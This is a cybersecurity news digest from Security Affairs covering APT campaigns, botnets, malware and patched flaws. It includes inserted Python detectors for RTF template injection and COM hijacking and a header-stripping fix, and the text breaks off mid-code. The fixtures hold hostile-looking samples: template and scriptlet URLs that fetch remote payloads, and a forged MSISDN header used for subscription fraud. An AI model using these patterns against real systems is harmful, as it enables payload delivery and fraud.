Security Affairs, 1 December 2021

New RTF Template Injection technique used by APT groups in recent attacks

1 December 2021 at 15:11

Nation-state actors from China, India, and Russia were spotted using a novel RTF template injection technique in recent attacks.

APT groups from China, India, and Russia have used a new RTF (rich text format) template injection technique in recent phishing attacks.

The technique was first reported by security firm Proofpoint, which has observed phishing campaigns using weaponized RTF template injection since March 2021. The experts believe that nation-state actors will continue to use the technique in future campaigns.

RTF template injection abuses a legitimate RTF feature: the document formatting properties of an RTF file can reference a template through the `\*\template` control word, and the value is normally a path to a local file. The same control word accepts a URL, so an attacker simply replaces the legitimate file destination with a link to a malicious payload on a remote server, and the payload is fetched when the document is opened.

Experts pointed out that the technique has a lower detection rate by public antivirus engines when compared to the Office-based template injection technique.

“Proofpoint has identified distinct phishing campaigns utilizing the technique which have been attributed to a diverse set of APT threat actors in the wild. While this technique appears to be making the rounds among APT actors in several nations, Proofpoint assesses with moderate confidence, based on the recent rise in its usage and the triviality of its implementation, that it could soon be adopted by cybercriminals as well.” reads the analysis published by Proofpoint.

“By altering an RTF file’s document formatting properties, specifically the document formatting control word for “\*\template” structure, actors can weaponize an RTF file to retrieve remote content by specifying a URL resource instead of an accessible file resource destination.”

In the attacks observed by the researchers, threat actors obfuscated the URL inside the RTF file using RTF's Unicode escape notation (`\uN`, where N is a signed 16-bit decimal code point), so that the URL never appears as plain text in the file. The trick was an attempt to evade static detection signatures in anti-virus engines.


The technique also works for .doc.rtf files opened with Microsoft Word, since Word identifies RTF by content rather than by extension. When an RTF remote template injection file is opened in Word, the application retrieves the resource from the specified URL before displaying the content of the file.
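To make the detection concrete, below is a small checker added for this page (it is not code from Proofpoint's report or its YARA rules) that pulls the `\*\template` value out of an RTF file, decodes the `\uN` and `\'hh` escapes the actors used to hide the URL, and flags targets that are URLs or UNC paths rather than local files. The three RTF snippets are constructed for the example, and example.invalid is a placeholder host.

```python
import re

# The \*\template group carries the document template path. RTF writes a
# literal backslash as "\\", so a local path looks like C:\\Users\\... in the file.
_TEMPLATE_GROUP = re.compile(r"\{\\\*\\template\s?(.*?)\}", re.S)
# \uN: N is a signed 16-bit decimal code point, usually followed by a fallback
# character (most writers emit "?") for readers that cannot render Unicode.
_UNICODE_ESC = re.compile(r"\\u(-?\d{1,5})\s?\??")
# \'hh: 8-bit hex escape in the document's code page
_HEX_ESC = re.compile(r"\\'([0-9a-fA-F]{2})")
# Anything Word would fetch over the network instead of opening locally.
_REMOTE = re.compile(r"^(?:https?://|ftp://|\\\\)", re.I)


def decode_rtf_text(raw: str) -> str:
    """Turn the raw contents of an RTF group into plain characters."""
    def uni(m):
        n = int(m.group(1))
        if n < 0:
            n += 0x10000  # negative values encode code points 0x8000..0xFFFF
        return chr(n)
    text = _UNICODE_ESC.sub(uni, raw)
    text = _HEX_ESC.sub(lambda m: chr(int(m.group(1), 16)), text)
    text = text.replace("\\\\", "\\")  # un-escape literal backslashes last
    return text.strip()


def is_rtf(data: bytes) -> bool:
    """Word sniffs content, not extension: a .doc that starts with {\\rt is RTF."""
    return data.lstrip().startswith(b"{\\rt")


def template_target(rtf: str):
    """Return the decoded \\*\\template value, or None if the file has none."""
    m = _TEMPLATE_GROUP.search(rtf)
    return decode_rtf_text(m.group(1)) if m else None


def is_remote_template(rtf: str) -> bool:
    """True when the template points at a URL or UNC path instead of a local file."""
    target = template_target(rtf)
    return bool(target) and bool(_REMOTE.match(target))


# Constructed samples (not real malware). OBFUSCATED spells "http://" with \uN escapes.
BENIGN = r"{\rtf1\ansi{\*\template C:\\Users\\me\\Templates\\Normal.dotm}\pard Hello\par}"
PLAIN_URL = r"{\rtf1\ansi{\*\template http://example.invalid/t.dotm}\pard Hello\par}"
OBFUSCATED = (r"{\rtf1\ansi{\*\template \u104?\u116?\u116?\u112?\u58?\u47?\u47?"
              r"example.invalid/t.dotm}\pard Hi\par}")

if __name__ == "__main__":
    for name, sample in [("benign", BENIGN), ("plain", PLAIN_URL), ("obfuscated", OBFUSCATED)]:
        print(f"{name}: template={template_target(sample)!r} remote={is_remote_template(sample)}")
```

Decoding before matching is the important step: a signature that looks for the literal string `http` in the `\*\template` group misses the `\uN` variant entirely, which is exactly why the actors used it. Run `is_rtf` on the raw bytes first, so renamed .doc files are not skipped on extension alone.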

Proofpoint reported that it observed the technique in use by the DoNot Team, Gamaredon, and TA423 APT groups.


“The viability of XML Office based remote template documents has proven that this type of delivery mechanism is a durable and effective method when paired with phishing as an initial delivery vector. The innovation by threat actors to bring this method to a new file type in RTFs represents an expanding surface area of threat for organizations worldwide.” concludes the report. “While this method currently is used by a limited number of APT actors with a range of sophistication, the technique’s effectiveness combined with its ease of use is likely to drive its adoption further across the threat landscape.”

Proofpoint shared YARA signatures for the attacks using this technique.

Follow me on Twitter: @securityaffairs and Facebook

Pierluigi Paganini

(SecurityAffairs – hacking, RTF template injection)

The post New RTF Template Inject technique used by APT groups in recent attacks appeared first on Security Affairs.

FBI training document shows lawful access to multiple encrypted messaging apps

1 December 2021 at 09:57

Which are the most secure encrypted messaging apps? An FBI document shows what data can be obtained from them.

The Record shared an FBI training document that reveals what data US law enforcement can obtain from encrypted messaging apps.

The document analyzes lawful access to multiple encrypted messaging apps, including iMessage, Line, Signal, Telegram, Threema, Viber, WhatsApp, WeChat, and Wickr.


The document, dated January 7, 2021, was obtained through a FOIA request filed by the US nonprofit organization Property of the People.

We got an FBI training doc on obtaining data from secure messaging apps, and shared it w/ @AndyKroll/@RollingStone. #FOIA https://t.co/FcjEUV1sN3

— PropertyOfThePeople (@PropOTP) November 29, 2021

“As of November 2020, the FBI’s ability to legally access secure content on leading messaging applications is depicted below, including details on accessible information based on the applicable legal process. Return data provided by the companies listed below, with the exception of WhatsApp, are actually logs of latent data that are provided to law enforcement in a non-real-time manner and may impact investigations due to delivery delays.” reads the document.

The information in the training document provides an up-to-date picture of law enforcement's ability to access the content of popular messaging apps.

Feds cannot access the message content for Signal, Telegram, Threema, Viber, WeChat, and Wickr, while they can gain limited access to the content of encrypted communications from iMessage, Line, and WhatsApp.

Even where content is out of reach, depending on the app, law enforcement can still obtain varying amounts of metadata that could allow end users to be identified.


Sabbath Ransomware targets critical infrastructure in the US and Canada

1 December 2021 at 07:25

Sabbath ransomware is a new threat that has been targeting critical infrastructure in the United States and Canada since June 2021.

A new ransomware group called Sabbath (aka UNC2190) has been targeting critical infrastructure in the United States and Canada since June 2021. According to Mandiant researchers, the group is a rebrand of Arcane and Eruption gangs.

According to a warning from Mandiant, the group previously operated under the names Arcane and Eruption and was observed last year deploying the ROLLCOAST ransomware. In September 2021, the security experts noticed a post on the exploit.in hacking forum looking for affiliates for a new ransomware operation. The activity of the new group, named 54BB47h (Sabbath), began on October 21, 2021, when the operators set up a shaming site and blog.

In October the ransomware gang infected systems at a school district in the United States and demanded a multi-million dollar ransom.


Unlike most other ransomware affiliate programs, the Sabbath operators provided their affiliates with pre-configured Cobalt Strike BEACON backdoor payloads.

“In contrast with most other affiliate programs, Mandiant observed two occasions where the ransomware operator provided its affiliates with pre-configured Cobalt Strike BEACON backdoor payloads. While the use of BEACON is common practice in ransomware intrusions, the use of a ransom affiliate program operator provided BEACON is unusual and offers both a challenge for attribution efforts while also offering additional avenues for detection.” reads the post published by Mandiant.

The Sabbath ransomware gang has targeted critical infrastructure, including education, health, and natural resources in the United States and Canada. 

In July 2020, the UNC2190 threat actors deployed ROLLCOAST ransomware while they were branded as Eruption. Mandiant researchers found no evidence for the use of the same ransomware in 2021.

The ROLLCOAST ransomware runs in memory and checks the system language to avoid infecting Russia and other Commonwealth of Independent States member countries.

ROLLCOAST also shows similarities to Tycoon ransomware, such as the use of AES in GCM mode for encryption and an overlap between the ignored directories, files, and extensions including the ignored extension “.lolz”.

Mandiant found that the BEACON samples and infrastructure used by the Sabbath and Arcane affiliate services did not change during 2021. The operators pack UNC2190's BEACON payloads with the commercial Themida packer to avoid detection.

“Although UNC2190 is a lesser known and potentially a smaller ransomware affiliate group, its smaller size and repeated rebranding has allowed it to avoid much public scrutiny.” concludes the report. “UNC2190 has continued to operate over the past year while making only minor changes to their strategies and tooling, including the introduction of a commercial packer and the rebranding of their service offering. This highlights how well-known tools, such as BEACON, can lead to impactful and lucrative incidents even when leveraged by lesser-known groups.”


Security Affairs, 30 November 2021

Play the Opera Please – Opera patches a flaw in their turbo servers

30 November 2021 at 21:24

Opera released a mini patch for a vulnerability in their turbo servers that dates back to 2018.

Prior approval was obtained from the Opera security team before disclosing this issue.

Before we get started, there are a few terms we need to understand:

Value added service (VAS): a telecommunications term for non-core services, for example caller tunes, missed-call alerts and online gaming.

GGSN: the gateway GPRS support node is a core network component responsible for the interworking between the GPRS network and external packet networks; essentially, it is a routing device.

HTTP header enrichment (HE Process): HTTP header enrichment is the process of adding data fields in the HTTP header. This is commonly used in mobile networks by adding user and device identifiers in HTTP requests such as IMEI, IMSI, MSISDN or other data to identify subscriber or mobile device details[1].

As per my understanding, during a VAS subscription process the GGSN picks up the MSISDN from the HTTP header to subscribe end users; the idea is to abuse the HTTP header enrichment process via the Opera Mini browser, which could lead to fraudulent VAS activation.

Why Opera Mini? Opera Mini is known for its data compression (data saving mode); it supports three data saving modes: direct, extreme and high.

Once the request is initiated and routed by the GGSN, all communication happens over HTTPS, so the GGSN never learns the source MSISDN: no header enrichment takes place, because the Opera turbo server establishes a secure session and performs the rest of the subscription flow inside it. In this case the GGSN acts purely as a routing device and cannot perform the HE process (HE can only be performed on plain HTTP, but Opera Mini creates an HTTPS session to the turbo server).

After this, if we navigate to https://www.inputzero.io and sniff the packets with Wireshark, the source IP is our public IP and the destination is an Opera turbo server such as `global-4-lvs-hopper.opera-mini.net` rather than www.inputzero.io.

Having said that, after countless assessments of the subscription process via Opera Mini, I found one `ping` request generated by Opera Mini when it is opened for the first time after clearing the browser's cache and temp data. It was observed that this ping request is responsible for taking the MSISDN and creating the session for the entire flow.

Injecting an MSISDN header into this request with the victim's MSISDN, the session was established with the Opera turbo server under the victim's number, and you can now impersonate the victim and subscribe to any VAS service to deduct his/her digital money. With a successful subscription using the above steps and the server log, it was concluded that Opera turbo servers don't validate/filter certain injected HTTP headers, which leads to activation of VAS services.

Patch: Opera turbo servers now stop forwarding such injected HTTP headers. CVE-2018-19825 was assigned to the issue; its description states “Lack of filtering of certain HTTP headers could lead to fraudulent VAS activation.”
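The fix is a trust-boundary rule: a subscriber-identifying header is only meaningful when the operator's network element added it, so a proxy that terminates the client connection must drop any copy the client supplied before relaying the request. The Python below is an added illustration of that rule, not Opera's code; the header names (X-MSISDN and friends), the sample request and the toy VAS backend are assumptions, since the post does not name the header that was forwarded.

```python
# Subscriber-identifying headers a mobile core may inject via header enrichment.
# Assumed names based on common operator practice; the post does not name Opera's.
ENRICHMENT_HEADERS = frozenset({
    "x-msisdn", "x-up-calling-line-id", "x-nokia-msisdn", "x-imsi", "x-imei",
})


def normalize(headers):
    """Fold header names to lower case. HTTP header names are case-insensitive,
    so a filter matching only "X-MSISDN" would let "x-msisdn" through."""
    return {k.lower(): v for k, v in headers.items()}


def relay_headers_vulnerable(client_headers):
    """Pre-patch behaviour as described in the post: relay whatever the client sent."""
    return normalize(client_headers)


def relay_headers_hardened(client_headers, network_enrichment=None):
    """Strip enrichment headers that arrived from the client; only the operator
    side (values the GGSN added on a plain-HTTP hop) may set them."""
    clean = {k: v for k, v in normalize(client_headers).items()
             if k not in ENRICHMENT_HEADERS}
    clean.update(normalize(network_enrichment or {}))
    return clean


def vas_subscribe(headers):
    """Toy VAS backend: bills the MSISDN found in the enriched header, if any."""
    msisdn = normalize(headers).get("x-msisdn")
    if not msisdn or not msisdn.isdigit():
        return None  # no trusted subscriber identity, so no subscription
    return {"subscribed": msisdn}


# Constructed attacker request: the MSISDN is the victim's number, chosen by the attacker.
ATTACKER_REQUEST = {
    "Host": "vas.example.invalid",
    "User-Agent": "Opera Mini",
    "X-MSISDN": "919999999999",
}

if __name__ == "__main__":
    print("vulnerable relay:", vas_subscribe(relay_headers_vulnerable(ATTACKER_REQUEST)))
    print("hardened relay:  ", vas_subscribe(relay_headers_hardened(ATTACKER_REQUEST)))
```

With the vulnerable relay the backend bills whatever number the attacker typed; with the hardened relay the request reaches the backend without any MSISDN and the subscription is refused. The same strip-then-enrich ordering applies to any proxy or load balancer that sits in front of a system trusting edge-injected identity headers (X-Forwarded-For is the everyday analogue).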

About the Author: Security Researcher Dhiraj Mishra (@mishradhiraj)

Original Post @ https://www.inputzero.io/2021/04/play-the-opera-please.html


New EwDoor Botnet is targeting AT&T customers

30 November 2021 at 19:09

360 Netlab experts spotted a new botnet dubbed EwDoor that infects unpatched AT&T enterprise network edge devices.

Experts from Qihoo 360’s Network Security Research Lab discovered a new botnet, dubbed EwDoor, that targets AT&T customers using EdgeMarc Enterprise Session Border Controller (ESBC) edge devices that are publicly exposed to the Internet.

The attackers are targeting Edgewater Networks’ devices by exploiting the CVE-2017-6079 vulnerability with a relatively unique mount file system command.

“On October 27, 2021, our Botmon system identified an attacker attacking Edgewater Networks’ devices via CVE-2017-6079 with a relatively unique mount file system command in its payload, which had our attention, and after analysis, we confirmed that this was a brand new botnet, and based on its targeting of Edgewater producers and its Backdoor feature, we named it EwDoor.” reads the analysis published by Qihoo 360.

For a limited period of time, the researchers were able to measure the size of the botnet through sinkholing: they noticed that EwDoor uses a backup mechanism for its C2, and registered one of its backup command-and-control (C2) domains (iunno[.]se) to observe the connections from infected devices.

EwDoor's operators later changed the communication model, after which the experts could no longer observe the requesters.

During a few hours of observation, the researchers determined that the infected systems were EdgeMarc Enterprise Session Border Controllers used by AT&T. They identified 5,700 infected systems, all located in the US.

“By back-checking the SSL certificates used by these devices [infected devices that contacted the C2 during sinkholing], we found that there were about 100k IPs using the same SSL certificate. We are not sure how many devices corresponding to these IPs could be infected, but we can speculate that as they belong to the same class of devices the possible impact is real.” continues the report.

Researchers have identified 3 versions of the malware. The bot is mainly used to launch DDoS attacks and to establish a backdoor on infected devices to gather sensitive information, such as call logs.

The bot supports the following functions:

  • Self updating
  • Port scanning
  • File management
  • DDoS attack
  • Reverse SHELL
  • Execute arbitrary commands

The botnet implements several measures to hinder analysis by security researchers: TLS to prevent C2 communication from being intercepted, encryption of sensitive resources to make reverse engineering harder, and hosting the C2 address in the cloud and delivering it through a BitTorrent tracker so that it cannot be extracted directly by IOC systems.

“Modify the “ABIFLAGS” PHT in ELF to counter qemu-user and some high kernel versions of the linux sandbox. This is a relatively rare countermeasure, which shows that the author of EwDoor is very familiar with the Linux kernel, QEMU, and Edgewater devices.” continues the report.

The experts provide additional technical details on the EwDoor botnet in the report and shared indicators of compromise (IOCs) for this threat.


Critical Printing Shellz flaws impact 150 HP multifunction printer models

30 November 2021 at 15:44

Researchers discovered a critical wormable buffer overflow vulnerability that affects 150 different HP multifunction printer models (MFPs).

Cybersecurity researchers from F-Secure have discovered two critical vulnerabilities, collectively tracked as Printing Shellz, that impact approximately 150 multifunction printer models.

The vulnerabilities can be exploited by attackers to take control of vulnerable devices and steal sensitive information, from enterprise networks. The issues date back to 2013 and HP fixed them ([1], [2]) in November. The company acknowledged F-Secure Labs researchers Timo Hirvonen and Alexander Bolshev for reporting the vulnerabilities on April 29, 2021.

The two vulnerabilities are:

  • CVE-2021-39237 (CVSS score: 7.1) – An information disclosure vulnerability impacting certain HP LaserJet, HP LaserJet Managed, HP PageWide, and HP PageWide Managed printers.
  • CVE-2021-39238 (CVSS score: 9.3) – A buffer overflow vulnerability impacting certain HP Enterprise LaserJet, HP LaserJet Managed, HP Enterprise PageWide, and HP PageWide Managed products.

“We found multiple exploitable bugs in a HP multi-function printer (MFP). The flaws are in the unit’s communications board and font parser.” reads the FAQ published by F-Secure researchers. “An attacker can exploit them to gain code execution rights, with the former requiring physical access while the latter can be accomplished remotely. A successful attack will allow an adversary to achieve various objectives, including stealing information or using the compromised machine as a beachhead for future attacks against an organization.”

Both flaws can be exploited locally with physical access to the vulnerable device, for example by printing from a USB drive. The font-parser flaw can also be triggered by printing from another device in the same network segment; in that scenario the exploit can replicate itself to other vulnerable MFPs across the network, which is what makes it wormable.

Below are the attack scenarios detailed by the researchers:

  • Printing from USB drives. This is what we used during the research. In the modern firmware versions, printing from USB is disabled by default.
  • Social engineering a user into printing a malicious document. It may be possible to embed an exploit for the font-parsing vulnerabilities in a PDF. The opportunities for social engineering are endless: HR printing a CV before a job interview, a receptionist printing a boarding pass, etc.
  • Printing by connecting directly to the physical LAN port.
  • Printing from another device that is under attacker’s control and in the same network segment. This also implies that the respective flaw (CVE-2021-39238) is wormable, i.e., the exploit can be used to create a worm that replicates itself to other vulnerable MFPs across the network.
  • Cross-site printing (XSP): sending the exploit to the printer directly from the browser (by tricking a user into visiting a malicious website, for example) using an HTTP POST to JetDirect port 9100/TCP. This is probably the most attractive attack vector.
  • Direct attack via exposed UART ports that are mentioned in CVE-2021-39237, if the attacker has physical access to the device for a short period of time.

Organizations should install the patches as soon as possible, the public disclosure of the vulnerabilities will likely trigger a wave of attacks attempting to exploit the vulnerabilities.


WIRTE APT group targets the Middle East since at least 2019

30 November 2021 at 13:57

A threat actor named WIRTE targets government, diplomatic entities, military organizations, law firms, and financial institutions in Middle East.

Cybersecurity researchers from Kaspersky have detailed the activity of a threat actor named WIRTE that is targeting government, diplomatic entities, military organizations, law firms, and financial institutions in Middle East since early 2019.

The activity of the WIRTE group was first documented by researchers at Lab52 in 2019; the group is a politically motivated threat actor linked to the Gaza Cybergang. Other victims of the group are located in Armenia, Cyprus, Egypt, Jordan, Lebanon, Palestine, Syria, and Turkey.


The group launched spear-phishing campaigns using weaponized Microsoft Office documents to deploy VBS/VBA implants. The weaponized Excel documents acted as droppers that use hidden spreadsheets and VBA macros to deliver a first stage implant, which is a Visual Basic Script (VBS). The VBS implant is a script that collects system information and executes arbitrary code on the infected machine.

The first-stage implant also downloads and installs a next-stage dropper named Ferocious, which uses a living-off-the-land (LotL) technique called COM hijacking to achieve persistence and to execute a PowerShell script dubbed LitePower Stager.
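COM hijacking works because, for a non-elevated process, per-user class registrations under HKCU\Software\Classes take precedence over the machine-wide ones in HKLM, so a dropper can point an existing CLSID at its own DLL or scriptlet without administrative rights and get loaded whenever that object is instantiated. The Python below is added here as an illustration of how to review a registry snapshot for that pattern; it is not taken from Kaspersky's report on Ferocious, the snapshot, CLSIDs and paths are constructed, and the heuristics (user-writable path, script-host server, ScriptletURL) are general rather than WIRTE-specific.

```python
import re

# Constructed snapshot of per-user CLSID values, as a flattened "reg export" of
# HKCU\Software\Classes\CLSID might look. Not data from the Kaspersky report.
SAMPLE_HKCU_CLSID = {
    r"HKCU\Software\Classes\CLSID\{11111111-0000-0000-0000-000000000001}\InprocServer32":
        r"C:\Program Files\Vendor\vendor.dll",
    r"HKCU\Software\Classes\CLSID\{22222222-0000-0000-0000-000000000002}\InprocServer32":
        r"C:\Users\alice\AppData\Roaming\Microsoft\update.dll",
    r"HKCU\Software\Classes\CLSID\{33333333-0000-0000-0000-000000000003}\InprocServer32":
        r"C:\Windows\System32\scrobj.dll",
    r"HKCU\Software\Classes\CLSID\{33333333-0000-0000-0000-000000000003}\ScriptletURL":
        "http://example.invalid/stage.sct",
}

_CLSID_KEY = re.compile(r"^HKCU\\Software\\Classes\\CLSID\\(\{[0-9A-F-]+\})\\(\w+)$", re.I)
# Locations a standard user can write to: a COM server living here needs no admin rights.
_USER_WRITABLE = re.compile(
    r"^(?:C:\\Users\\|%APPDATA%|%TEMP%|%LOCALAPPDATA%|C:\\ProgramData\\)", re.I)
# Script hosts and LOLBins that let a registry value alone run attacker-controlled code.
_INTERPRETERS = re.compile(
    r"\\(?:scrobj\.dll|mshta\.exe|powershell\.exe|wscript\.exe|cscript\.exe|rundll32\.exe|regsvr32\.exe)\b",
    re.I)


def find_com_hijacks(snapshot):
    """Return per-user CLSID registrations whose server looks attacker-controlled.

    Each finding lists the CLSID, the registered server and the reasons it was flagged.
    """
    by_clsid = {}
    for path, value in snapshot.items():
        m = _CLSID_KEY.match(path)
        if m:
            by_clsid.setdefault(m.group(1).upper(), {})[m.group(2)] = value

    findings = []
    for clsid, keys in by_clsid.items():
        server = keys.get("InprocServer32") or keys.get("LocalServer32")
        if server is None:
            continue
        unquoted = server.strip('"')
        reasons = []
        if _USER_WRITABLE.match(unquoted):
            reasons.append("server binary in user-writable path")
        if _INTERPRETERS.search(unquoted):
            reasons.append("server is a script host / LOLBin")
        if "ScriptletURL" in keys:
            reasons.append("ScriptletURL set: " + keys["ScriptletURL"])
        if reasons:
            findings.append({"clsid": clsid, "server": server, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for hit in find_com_hijacks(SAMPLE_HKCU_CLSID):
        print(hit["clsid"], "->", hit["server"], "|", "; ".join(hit["reasons"]))
```

On the sample the vendor DLL under Program Files is left alone, the DLL under the user's AppData is flagged, and the scrobj.dll entry is flagged twice (script host plus a remote scriptlet). Per-user installers such as some chat clients legitimately register COM servers under AppData, so treat hits as a review queue and baseline known-good CLSIDs rather than alerting on every one.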

The LitePower stager is a small PowerShell implant that acts as a downloader and secondary stager: it executes commands sent by the C2 and can download and deploy further malware. The experts were able to locate C2 servers in Ukraine and Estonia.

“In our initial sample analysis, the C2 domain we observed was stgeorgebankers[.]com. After conducting pivots through malware samples, we were able to identify multiple C2 domains that date back to at least December 2019.” continues the analysis. “These C2 domains were occasionally behind CloudFlare to obscure the real C2 IP address. Thanks to collaboration with our partners, we were able to gather some of the original C2 IP addresses, which allowed us to discover that the servers are hosted in Ukraine and Estonia.”

WIRTE's operators have stayed under the radar for a long time. The attacks against law firms and financial institutions represent a notable shift for a group that is politically motivated.

“WIRTE modified their toolset and how they operate to remain stealthy for a longer period of time. Living-off-the-land (LotL) techniques are an interesting new addition to their TTPs. This suspected subgroup of Gaza Cybergang used simple yet effective methods to compromise its victims with better OpSec than its suspected counterparts. Using interpreted language malware such as VBS and PowerShell scripts, unlike the other Gaza Cybergang subgroups, adds flexibility to update their toolset and avoid static detection controls.” continues the report. “Whether WIRTE is a new subgroup or an evolution of existing Gaza Cybergang subgroups, we see them expanding their presence further in cyberspace by using updated and stealthier TTPs.”


4 Android banking trojans were spread via Google Play infecting 300.000+ devices

30 November 2021 at 07:44

Experts found four Android banking trojans that were available on the official Google Play Store and infected more than 300,000 devices.

Researchers from ThreatFabric discovered four distinct Android banking trojans that were spread via the official Google Play Store between August and November 2021. According to the experts, the malware infected more than 300,000 devices through multiple dropper apps.


Threat actors are refining their techniques to bypass the security checks Google applies to apps in its Play Store. One trick is to introduce carefully planned, small malicious code updates over a longer period, so that no single Play Store submission looks malicious. Another is to design look-alike command-and-control (C2) websites that match the theme of the dropper app, so that the C2 traffic slips past conventional detection methods.

“To make themselves even more difficult to detect, the actors behind these dropper apps only manually activate the installation of the banking trojan on an infected device in case they desire more victims in a specific region of the world. This makes automated detection a much harder strategy to adopt by any organization.” reads the analysis published by the experts. “VirusTotal does not showcase the evolution of detections of antivirus products over time, but almost all campaigns have or had a 0/62 FUD score on VirusTotal at some point in time, confirming the difficulty of detecting dropper apps with a minimal footprint.”

The droppers were designed to distribute the Android banking trojans Anatsa, Alien, ERMAC, and Hydra.

Below is the list of dropper apps used to distribute the above banking trojans:

  • Two Factor Authenticator (com.flowdivison)
  • Protection Guard (com.protectionguard.app)
  • QR CreatorScanner (com.ready.qrscanner.mix)
  • Master Scanner Live (com.multifuction.combine.qr)
  • QR Scanner 2021 (com.qr.code.generate)
  • QR Scanner (com.qr.barqr.scangen)
  • PDF Document (com.xaviermuches.docscannerpro2)
  • Scanner – Scan to PDF
  • PDF Document Scanner (com.docscanverifier.mobile)
  • PDF Document Scanner Free (com.doscanner.mobile)
  • CryptoTracker (cryptolistapp.app.com.cryptotracker)
  • Gym and Fitness Trainer (com.gym.trainer.jeux)

ThreatFabric researchers spotted multiple samples dropped by the Brunhilda threat actor, the same group that was seen distributing the Vultur trojan in July 2021. In one case, the researchers observed Brunhilda posing as a QR code creator app to drop the Hydra and ERMAC malware on the devices of users in previously untapped countries, such as the United States.

“In the span of only 4 months, 4 large Android families were spread via Google Play, resulting in 300.000+ infections via multiple dropper apps.” concludes the report. “A noticeable trend in the new dropper campaigns is that actors are focusing on loaders with a reduced malicious footprint in Google Play, considerably increasing the difficulties in detecting them with automation and machine learning techniques.

The small malicious footprint is a result of the new Google Play restrictions (current and planned) to put limitations on the use of privacy concerning app permissions.”


Security Affairs, 29 November 2021

Google experts found 2 flaws in video conferencing software Zoom

29 November 2021 at 22:53

Google Project Zero researchers have discovered two vulnerabilities in the video conferencing software Zoom that expose users to attacks.

Security researchers from Google Project Zero discovered two vulnerabilities in the video conferencing software Zoom that expose users to attacks. The vulnerabilities impact Zoom Client for Meetings on Windows, macOS, Linux, iOS, and Android.

The issues in the video conferencing software Zoom were discovered by Google Project Zero researcher Natalie Silvanovich. The first flaw, tracked as CVE-2021-34423, is a high-severity buffer overflow vulnerability that received a CVSS base score of 7.3.

“A buffer overflow vulnerability was discovered in the products listed in the “Affected Products” section of this bulletin. This can potentially allow a malicious actor to crash the service or application, or leverage this vulnerability to execute arbitrary code.” reads the security advisory published by Zoom.

The second vulnerability addressed by the company, tracked as CVE-2021-34424, is an information disclosure issue that exposes process memory; it also received a CVSS base score of 7.3.

“A vulnerability was discovered in the products listed in the “Affected Products” section of this bulletin which potentially allowed for the exposure of the state of process memory. This issue could be used to potentially gain insight into arbitrary areas of the product’s memory.” reads the advisory.

Below is the list of affected Zoom products:

  • Zoom Client for Meetings (for Android, iOS, Linux, macOS, and Windows) before version 5.8.4
  • Zoom Client for Meetings for Blackberry (for Android and iOS) before version 5.8.1
  • Zoom Client for Meetings for intune (for Android and iOS) before version 5.8.4
  • Zoom Client for Meetings for Chrome OS before version 5.0.1
  • Zoom Rooms for Conference Room (for Android, AndroidBali, macOS, and Windows) before version 5.8.3
  • Controllers for Zoom Rooms (for Android, iOS, and Windows) before version 5.8.3
  • Zoom VDI before version 5.8.4
  • Zoom Meeting SDK for Android before version 5.7.6.1922
  • Zoom Meeting SDK for iOS before version 5.7.6.1082
  • Zoom Meeting SDK for macOS before version 5.7.6.1340
  • Zoom Meeting SDK for Windows before version 5.7.6.1081
  • Zoom Video SDK (for Android, iOS, macOS, and Windows) before version 1.1.2
  • Zoom On-Premise Meeting Connector Controller before version 4.8.12.20211115
  • Zoom On-Premise Meeting Connector MMR before version 4.8.12.20211115
  • Zoom On-Premise Recording Connector before version 5.1.0.65.20211116
  • Zoom On-Premise Virtual Room Connector before version 4.4.7266.20211117
  • Zoom On-Premise Virtual Room Connector Load Balancer before version 2.5.5692.20211117
  • Zoom Hybrid Zproxy before version 1.0.1058.20211116
  • Zoom Hybrid MMR before version 4.6.20211116.131_x86-64


Panasonic confirmed that its network was illegally accessed by attackers

29 November 2021 at 21:36

Panasonic disclosed a security breach after threat actors gained access to its servers storing potentially sensitive information.

Japanese electronics giant Panasonic disclosed a security breach after threat actors gained access to some servers of the company containing sensitive data.

The company discovered the intrusion on November 11 and immediately launched an investigation, which is still ongoing, to determine the scope of the attack.

“Panasonic Corporation has confirmed that its network was illegally accessed by a third party on November 11, 2021. As the result of an internal investigation, it was determined that some data on a file server had been accessed during the intrusion.” reads the notice of unauthorized access to file server. “After detecting the unauthorized access, the company immediately reported the incident to the relevant authorities and implemented security countermeasures, including steps to prevent external access to the network.”

The company retained a third-party cybersecurity firm to investigate the leak and determine which kind of information was stolen by the attackers.

Japanese news websites ([1], [2]) reported that threat actors gained access to information related to the company’s technology, business partners’ data, and employees’ information.

According to the Mainichi website, threat actors reportedly accessed the Panasonic servers multiple times between June and November.

In November 2020, Panasonic suffered a data breach after a cyber attack hit an Indian subsidiary. At the time, threat actors gained access to financial information, credentials and email addresses.

Pierluigi Paganini

(SecurityAffairs – hacking, Panasonic)

Experts warn of attacks exploiting CVE-2021-40438 flaw in Apache HTTP Server

29 November 2021 at 15:18

Threat actors are exploiting the recently patched CVE-2021-40438 flaw in Apache HTTP Server, Germany's cybersecurity agency (BSI) and Cisco warn.

Threat actors are exploiting a recently addressed server-side request forgery (SSRF) vulnerability, tracked as CVE-2021-40438, in Apache HTTP servers.

The CVE-2021-40438 flaw can be exploited against httpd web servers that have the mod_proxy module enabled. A threat actor can trigger the issue using a specially crafted request to cause the module to forward the request to an arbitrary origin server.

The vulnerability was patched in mid-September with the release of version 2.4.49; it affects version 2.4.48 and earlier.

“A crafted request uri-path can cause mod_proxy to forward the request to an origin server chosen by the remote user.” reads the change log for version 2.4.49.

Since the public disclosure of the vulnerability, several PoC exploits for CVE-2021-40438 have been published.

Now experts from Germany’s Federal Office for Information Security (BSI) and Cisco are warning of ongoing attacks attempting to exploit the vulnerability.

Cisco published a security advisory to inform its customers that it is investigating the impact of the issue on its products. The issue impacts Prime Collaboration Provisioning, Security Manager, Expressway series and TelePresence Video Communication Server (VCS) products. However, the IT giant states that it is still investigating its product line.

“In November 2021, the Cisco PSIRT became aware of exploitation attempts of the vulnerability identified by CVE ID CVE-2021-40438.” reads the security advisory published by Cisco.

The German BSI agency also published an alert about this vulnerability; the agency is aware of at least one attack exploiting it.

“The BSI is aware of at least one case in which an attacker was able, through exploitation of the vulnerability, to obtain hash values of user credentials from the victim’s system. The vulnerability affects all versions of Apache HTTP Server 2.4.48 or older.” reads the alert published by the BSI.
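The two exposure conditions the article gives, an httpd build of 2.4.48 or earlier and mod_proxy loaded, can be checked from the text that `httpd -v` and `httpd -M` print. The following triage helper is an added example written for this page, not code from the article, the BSI, Cisco or the Apache project; the `httpd -v`/`httpd -M` output it parses is constructed sample text, not captured from a real host.

```python
"""Triage helper for CVE-2021-40438 exposure (added example, not from the
article or the Apache project).

It parses the text that `httpd -v` and `httpd -M` print and reports whether
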